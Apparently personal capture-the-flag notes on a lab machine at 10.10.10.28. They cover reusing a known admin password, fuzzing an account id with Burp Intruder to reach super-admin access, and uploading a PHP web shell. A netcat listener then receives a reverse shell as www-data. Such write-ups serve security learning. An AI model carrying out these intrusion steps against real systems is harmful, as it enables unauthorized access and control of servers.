2 :80

from source or login page:
admin@megacorp.com
http://10.10.10.28/cdn-cgi/login/index.php

Using password from ARCHETYPE BOX (as they are all in the same track)
> admin:MEGACORP_4dm1n!!

Browsed all pages, nothing available

Looking at 
http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=1
we can try fuzzing `id`

Using Burp Intrude, simple list 1-30;step 1;
We get id=30
<td>86575</td><td>super admin</td><td>superadmin@megacorp.com</td>

To access http://10.10.10.28/cdn-cgi/login/admin.php?content=uploads
we change access id=86575

Upload php shell

[18:08:05] 301 -  312B  - /uploads  ->  http://10.10.10.28/uploads/
[18:08:05] 403 -  276B  - /uploads/

http://10.10.10.28/uploads/shell.php

─$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.14.34] from (UNKNOWN) [10.10.10.28] 40116
SOCKET: Shell has connected! PID: 3615
whoami
www-data

Last updated